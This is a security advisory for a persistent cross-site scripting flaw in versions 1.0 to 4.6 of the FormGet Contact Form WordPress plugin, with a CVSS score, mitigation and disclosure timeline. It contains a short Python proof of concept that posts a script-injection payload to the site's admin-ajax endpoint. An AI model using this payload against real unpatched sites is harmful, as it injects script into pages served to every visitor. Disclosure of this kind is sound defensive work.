FormGet Contact Form 1.0 - 4.6, Persistent XSS
Due to exposing an AJAX function to anonymous users by using the ‘nopriv’ method of adding an AJAX action, anonymous users are able to insert arbitrary HTML / Javascript onto the site globally.
Homepage
https://wordpress.org/plugins/formget-contact-form/
CVSS Score
6.4
CSSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 4.7
Proof of Concept
The following Python script will result arbitrary Javascript being executed on page load. Any custom HTML content can be inserted into the ‘value’ field, so long as the text ‘sideBar’ exists in the provided data
import requests
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
"action":"request_response",
"value":"<!--sideBar--><script>alert('.')</script>"}
r = requests.post(url, data=payload)Timeline
- 2014-09-22: Discovered
- 2014-09-22: Reported to vendor
- 2014-09-24: Vendor responded with intent to fix
- 2014-09-29: Update requested from vendor
- 2014-09-30: CVE requested
- 2014-10-02: CVE assigned
- 2014-10-06: Update requested from vendor
- 2014-10-06: Vendor responded stating issue has been fixed, but no update available to the public yet. Will re check in two days
- 2014-10-08: No update available yet to the public – update requested from vendor
- 2014-10-08: Vendor responded, stating update made to 4.6. Fix has been put in place, but version number not incremented. Provided recommendation to increment version number
- 2014-10-10: Vendor releases 4.7 – issue resolved
- 2014-10-17: Advisory released